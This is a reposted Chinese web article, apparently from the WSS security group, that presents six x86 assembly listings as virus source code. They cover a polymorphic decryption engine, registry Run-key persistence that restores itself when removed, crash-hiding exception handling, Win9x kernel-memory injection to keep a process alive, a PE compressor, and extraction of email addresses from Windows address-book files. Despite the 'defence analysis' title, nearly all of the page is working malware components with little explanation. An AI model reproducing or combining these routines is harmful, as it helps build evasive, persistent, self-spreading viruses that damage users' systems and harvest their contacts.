<em id="kkln5"><ruby id="kkln5"><u id="kkln5"></u></ruby></em>
<rp id="kkln5"></rp>

    <s id="kkln5"><object id="kkln5"></object></s>
  1. <dd id="kkln5"><pre id="kkln5"></pre></dd>
  2. 首頁 > 編程 > Java > 正文

    病毒源碼解析之防御分析

    2019-09-06 23:33:18
    字體:
    來源:轉載
    供稿:網友
    1、超級病毒變形引擎

    此段代碼會在DATA段內生成一個解密代碼。

    .586p
    .model flat,STDCALL
    extrn ExitProcess: proc
    VirusSize=100h
    .data

    DecodeMethod dd ?
    DeCode:
    pushad
    call Encode
    db 100h dup(11h)
    Encode:
    db 100h dup(0cch)
    RndReg0 dd 0 ;eax
    RndReg1 dd 0 ;ebx
    RndCode dd 0 ;Rnd Code
    RndMima dd 60932561 ;Rnd Password

    .code
    @@Start:
    mov eax,RndMima
    ror eax,7
    mov RndCode,eax

    mov eax,RndCode
    mov ecx,eax
    and eax,011b
    mov RndReg0,eax
    xor ecx,RndMima
    and ecx,011b
    cmp eax,ecx
    jnz short ChooseRegOk
    inc ecx
    and ecx,011b
    ChooseRegOk:
    mov RndReg1,ecx


    mov edi,offset Encode

    ror RndCode,1
    call GetBxCode,0,RndReg0,RndCode
    mov esi,eax
    ContFillStep0:
    cld
    lodsb
    stosb
    cmp al,0cch
    jnz ContFillStep0
    dec edi

    ror RndCode,1
    call GetBxCode,1,RndReg1,RndCode
    mov esi,eax
    ContFillStep1:
    cld
    lodsb
    stosb
    cmp al,0cch
    jnz ContFillStep1
    dec edi

    mov ebx,edi ;//計算機Jmp指令用

    ror RndCode,1
    call GetBxCode,2,RndReg0,RndCode
    mov esi,eax
    ContFillStep2:
    cld
    lodsb
    stosb
    cmp al,0cch
    jnz ContFillStep2
    dec edi

    mov eax,RndMima
    mov [edi-4],eax ;//填寫隨機密碼
    mov eax,RndCode
    and eax,01
    mov DecodeMethod,eax ;//填寫DeCode方法

    ror RndCode,1
    call GetBxCode,3,RndReg0,RndCode
    mov esi,eax
    ContFillStep3:
    cld
    lodsb
    stosb
    cmp al,0cch
    jnz ContFillStep3
    dec edi

    ror RndCode,1
    call GetBxCode,4,RndReg1,RndCode
    mov esi,eax
    ContFillStep4:
    cld
    lodsb
    stosb
    cmp al,0cch
    jnz ContFillStep4
    dec edi

    ror RndCode,1
    call GetBxCode,5,RndReg0,RndCode
    mov esi,eax
    ContFillStep5:
    cld
    lodsb
    stosb
    cmp al,0cch
    jnz ContFillStep5
    dec edi

    mov al,0c3h
    mov [edi],al ;//填寫Ret指令

    sub ebx,edi
    mov [edi-1],bl ;//填寫jmp指令

    int 3;

    jmp DeCode
    ret
    GetBxCode proc uses ebx ecx edx esi edi,Step:dword,Reg:dword,Rnd:dword
    call GetBxCodeAddr
    Step0_Eax:
    mov eax,[esp]
    int 3;
    pop eax
    push eax
    int 3;
    Step0_Ebx:
    pop ebx
    push ebx
    int 3;
    push dword ptr[esp]
    pop ebx
    int 3;
    Step0_Ecx:
    mov ecx,[esp]
    int 3;
    pop ecx
    push ecx
    int 3;
    Step0_Edx:
    mov edx,[esp]
    int 3;
    mov edx,esp
    mov edx,[edx]
    int 3

    Step1_Eax:
    mov eax,VirusSize
    int 3
    sub eax,eax
    add ax,VirusSize+3081h
    sub ax,3081h
    int 3
    Step1_Ebx:
    mov ebx,VirusSize
    int 3;
    xor ebx,ebx
    or bx,VirusSize
    int 3;
    Step1_Ecx:
    sub ecx,ecx
    xor ecx,(VirusSize xor 3181h)
    xor ecx,(3181h)
    int 3;
    mov ecx,0
    and cx,VirusSize
    int 3
    Step1_Edx:
    and edx,0
    xor dx,(VirusSize-0281h)
    add dx,0281h
    int 3;
    xor edx,edx
    sub edx,(0181h-VirusSize)
    sub edx,-0181h
    int 3;

    Setp2_Eax:
    xor [eax],12345678h
    int 3
    add [eax],12345678h
    int 3
    Setp2_Ebx:
    xor [ebx],12345678h
    int 3;
    add [ebx],12345678h
    int 3;

    Setp2_Ecx:
    xor [ecx],12345678h
    int 3;
    add [ecx],12345678h
    int 3;
    Setp2_Edx:
    xor [edx],12345678h
    int 3;
    add [edx],12345678h
    int 3;
    Step3_Eax:
    add eax,4
    int 3
    inc eax
    inc eax
    inc eax
    inc eax
    int 3;
    Step3_Ebx:
    add ebx,5
    dec ebx
    int 3
    add ebx,2
    add ebx,2
    int 3;
    Step3_Ecx:
    sub ecx,-4
    int 3
    sub ecx,-5
    dec ecx
    int 3;
    Step3_Edx:
    inc edx
    sub edx,-3
    int 3
    add edx,04
    int 3;

    Step4_Eax:
    sub eax,4
    int 3
    dec eax
    dec eax
    dec eax
    sub eax,1
    int 3;
    Step4_Ebx:
    dec ebx
    sub ebx,3
    int 3;
    dec ebx
    dec ebx
    sub ebx,2
    int 3;
    Step4_Ecx:
    add cx,123
    sub cx,123+4
    int 3
    sub cx,-4
    dec cx
    sub cx,7
    int 3
    Step4_Edx:
    sub dx,2
    dec dx
    sub dx,1
    int 3
    inc edx
    sub dx,5
    int 3;
    Step5_Eax:
    jnz $
    int 3
    ja $
    int 3
    Step5_Ebx:
    jg $
    int 3
    jnb $
    int 3
    Step5_Ecx:
    jnl $
    int 3
    jnz $
    int 3
    Step5_Edx:
    ja $
    int 3
    jg $
    int 3

    GetBxCodeAddr:
    pop esi
    mov al,0cch ;//指令分割符
    mov ecx,Step
    shl ecx,1
    shl ecx,1
    add ecx,Reg ;//計算機得到的指令位置
    shl ecx,1
    and Rnd,01b
    add ecx,Rnd
    jcxz short GetBxCodeOver
    ContFindCode:
    push ecx
    ContFindCC:
    inc esi
    cmp [esi],al
    jnz ContFindCC
    pop ecx
    loop ContFindCode
    mov eax,esi
    inc eax
    ret
    GetBxCodeOver:
    mov eax,esi
    ret
    GetBxCode endp


    end @@Start


    2、Windows 9x/2000/xp 瑣定注冊表

    .586p
    .model flat,STDCALL
    .data

    HKeyStr db 'SOFTWAREMicrosoftWindowsCurrentVersionRun',0
    ValueName db 'wap32',0
    PathName db 'wap32.exe',0

    .code

    extrn RegOpenKeyA: proc
    extrn RegSetValueExA: proc
    extrn RegCloseKey: proc
    extrn ExitProcess: proc
    extrn RegNotifyChangeKeyValue: proc
    extrn CreateThread: proc
    extrn Sleep: proc
    extrn RegQueryValueExA: proc

    start:
    push eax
    call RegOpenKeyA,080000002h,offset HKeyStr,esp
    pop ebx
    call RegSetValueExA,ebx,offset ValueName,0,01,offset PathName,100h

    sub esp,100h
    mov eax,esp
    push 100h
    call RegQueryValueExA,ebx,offset ValueName,0,0,eax,esp
    pop eax
    add esp,100h

    push eax
    call CreateThread,0,0,offset RegProtectProc,ebx,0,esp
    pop eax
    call Sleep,1000*60*3
    ret

    RegProtectProc proc hKey:dword
    mov ebx,hKey
    sub esp,100h
    mov edi,esp
    call GetProtectKeyName
    db 'wap32',0
    GetProtectKeyName:
    pop esi
    push 100h
    call RegQueryValueExA,ebx,esi,0,0,edi,esp
    pop eax
    WaitRegChangeNotify:
    call RegNotifyChangeKeyValue,ebx,0,4,0,0
    call RegSetValueExA,ebx,esi,0,01,edi,100h
    jmp short WaitRegChangeNotify
    RegProtectProc endp

    end start



    3、 Windows 9x/2000 意外處理通用程序


    此段程序可以達到屏蔽程序錯誤的效果

    include wap32.inc

    .386p
    .model flat,stdcall

    extrn MessageBoxA: proc
    extrn ExitProcess: proc

    .data

    Msg db 'Fuck',0

    SetSehFrame: ;ecx=忽略錯誤繼續執行地址
    pop eax ;彈出返回地址
    push ecx ;保存忽略錯誤繼續執行地址
    call PushExceptionProc
    jmp short Exception
    PushExceptionProc:
    push fs:dword ptr[0]
    mov fs:[0],esp
    call GetEspAddr
    push D [edx] ;保存原Esp地址值
    mov [edx],esp
    jmp eax
    ClearSehFrame:
    pop eax ;彈出返回地址
    call GetEspAddr
    mov esp,[edx]
    pop D [edx] ;恢復原Esp地址值
    pop fs:dword ptr[0]
    pop ecx
    pop ecx ;彈出忽略錯誤繼續執行地址
    jmp eax

    Exception proc pRecord,pFrame,pContext,pDispatch
    call PushSehBackProc
    call ClearSehFrame
    jmp ecx
    PushSehBackProc:
    pop ecx
    mov eax,pContext
    mov [eax.cx_Eip],ecx
    xor eax,eax ;忽略錯誤繼續執行
    ret
    Exception endp

    GetEspAddr:
    call PushOffsetEspAddr
    dd ?
    PushOffsetEspAddr:
    pop edx
    ret


    .code

    Start:
    call PushErrorProc
    call MessageBoxA,0,offset Msg,offset Msg,0
    ret
    PushErrorProc:
    pop ecx
    call SetSehFrame
    mov ds:[0],eax
    call ClearSehFrame
    ret


    end Start



    4、Windows 9x 下進程不死術

    此段程序首先實現Win9x下注射遠程線程(新技術)
    然后與Win2k下進程不死術一樣了。
    include Win32.inc

    .386p
    .model flat,stdcall

    extrn GetProcAddress: proc
    extrn WinExec: proc
    extrn MessageBoxA: proc
    extrn Sleep: proc
    extrn GetCurrentProcessId: proc
    extrn OpenProcess: proc
    extrn GetCurrentProcess: proc
    extrn WriteProcessMemory: proc
    extrn GetExitCodeProcess: proc

    .data

    ;問題,要Sleep()這樣做使Kernel32有機會更新數據
    KnlThread proc ProcID:dword
    call GetKnlOpenProcess
    KnlOpenProcess dd ?
    GetKnlOpenProcess:
    pop eax
    call [eax],PROCESS_ALL_ACCESS,FALSE,ProcID
    or eax,eax
    jz short ExitProtectProc
    mov ebx,eax
    call GetKnlWaitForSingleObject
    KnlWaitForSingleObject dd ?
    GetKnlWaitForSingleObject:
    pop eax
    call [eax],ebx,-1h
    call GetFileNameAddress
    GetFileNameAddress:
    pop ecx
    add ecx,offset FileName-offset GetFileNameAddress
    call GetKnlWinExec
    KnlWinExec dd ?
    GetKnlWinExec:
    pop eax
    call [eax],ecx,01
    ExitProtectProc:
    ret
    KnlThread endp

    FileName db 'c:wap32.exe',0

    KnlOpenProcessStr db 'OpenProcess',0
    KnlWaitForObjectStr db 'WaitForSingleObject',0
    KnlWinExecStr db 'WinExec',0
    KnlSleepStr db 'Sleep',0
    KnlCreateKnlThreadStr db 'CreateKernelThread',0

    .code

    Start:
    call GetProcAddress,0bff70000h,offset KnlOpenProcessStr
    mov KnlOpenProcess,eax
    call GetProcAddress,0bff70000h,offset KnlWaitForObjectStr
    mov KnlWaitForSingleObject,eax
    call GetProcAddress,0bff70000h,offset KnlWinExecStr
    mov KnlWinExec,eax

    call MoveDataToKnl,offset Start,0bff70600h,100h

    call GetProcAddress,0bff70000h,offset KnlCreateKnlThreadStr
    mov ebx,eax
    call GetCurrentProcessId
    push eax
    call ebx,0,0,0bff70000h+600h,eax,0,esp
    pop eax
    call MessageBoxA,0,offset FileName,offset FileName,0
    ret

    MoveDataToKnl proc uses ebx esi edi,Src:dword,Des:dword,nCx:dword
    push eax
    sidt [esp-2]
    pop eax
    add eax,3*8
    mov ebx,[eax]
    mov edx,[eax+4]
    call SetIdt03
    pushad
    mov [eax],ebx
    mov [eax+4],edx
    cld
    rep movsb
    popad
    iret
    SetIdt03:
    cli
    pop W[eax]
    pop W[eax+6]
    mov esi,Src
    mov edi,Des
    mov ecx,nCx
    int 3;
    sti
    ret
    MoveDataToKnl endp

    end Start


    5、簡單算法,高效率壓縮PE文件

    .586p
    .model flat,STDCALL
    .data

    OldFile db 'pe.exe',0
    NewFile db 'pe.zzz',0

    FileData db 0,0
    .code
    extrn _lopen: proc,_lcreat: proc
    extrn _lread: proc,_lwrite: proc
    extrn _lclose: proc
    extrn ExitProcess: proc
    start:
    call _lopen,offset OldFile,0
    cmp eax,-1
    jz ExitProc
    mov esi,eax
    call _lcreat,offset NewFile,0
    cmp eax,-1
    jz CloseOldFile
    mov edi,eax

    xor ebx,ebx
    ReadData:
    call _lread,esi,offset FileData,1
    or eax,eax
    jz short ReadOver
    movzx eax,FileData
    or eax,eax
    jnz short NoZero
    inc ebx
    cmp ebx,0ffh
    jnz short ReadData
    xor eax,eax
    mov ah,bl
    xchg ax,word ptr FileData
    call _lwrite,edi,offset FileData,2
    xor ebx,ebx
    jmp short ReadData
    NoZero:
    or ebx,ebx
    jnz short NoZeroData
    call _lwrite,edi,offset FileData,1
    jmp short ReadData
    NoZeroData:
    push eax
    xor eax,eax
    mov ah,bl
    mov word ptr FileData,ax
    call _lwrite,edi,offset FileData,2
    xor ebx,ebx
    pop eax
    mov FileData,al
    call _lwrite,edi,offset FileData,1
    jmp ReadData
    ReadOver:
    or ebx,ebx
    jz short CloseFile
    xor eax,eax
    mov ah,bl
    xchg ax,word ptr FileData
    call _lwrite,edi,offset FileData,2
    xor ebx,ebx
    CloseFile:
    call _lclose,edi
    CloseOldFile:
    call _lclose,esi
    ExitProc:
    call ExitProcess,0

    end start

    6、提取Windows地址薄文件(*.WAB)的Email信息

    .586p
    .model flat,STDCALL
    .data

    MailFile db 'My.WAB',0

    .code

    extrn _lopen: proc,_lcreat: proc
    extrn _lread: proc,_lwrite: proc
    extrn _llseek: proc
    extrn _lclose: proc
    extrn MessageBoxA: proc
    extrn ExitProcess: proc
    extrn WideCharToMultiByte: proc

    start:
    call _lopen,offset MailFile,0
    cmp eax,-1
    jz short ExitProc
    mov ebx,eax
    sub esp,100h
    mov edi,esp
    call _lread,ebx,edi,100h
    cmp eax,100h
    jnz short CloseFile
    mov eax,[edi+60h] ;得到Unicode郵件名偏移
    call _llseek,ebx,eax,0
    mov ecx,[edi+64h] ;得到Unicode郵件名個數
    ContWabMail:
    push ecx
    call _lread,ebx,edi,44h ;讀一個記錄
    cmp eax,44
    sub esp,100h
    mov eax,esp
    call WideCharToMultiByte,0,200h,edi,-1,eax,100h,0,0
    mov eax,esp
    call MessageBoxA,0,eax,eax,0
    add esp,100h
    pop ecx
    loop short ContWabMail
    CloseFile:
    call _lclose,ebx
    ExitProc:
    call ExitProcess,0

    end start



    WSS(Whitecell Security Systems),一個非營利性民間技術組織,致力于各種系統安全技術的研究。堅持傳統的hacker精神,追求技術的精純。
    WSS 主頁:http://www.whitecell.org/
    WSS 論壇:http://www.whitecell.org/forum/
    發表評論 共有條評論
    用戶名: 密碼:
    驗證碼: 匿名發表
    <em id="kkln5"><ruby id="kkln5"><u id="kkln5"></u></ruby></em>
    <rp id="kkln5"></rp>

      <s id="kkln5"><object id="kkln5"></object></s>
    1. <dd id="kkln5"><pre id="kkln5"></pre></dd>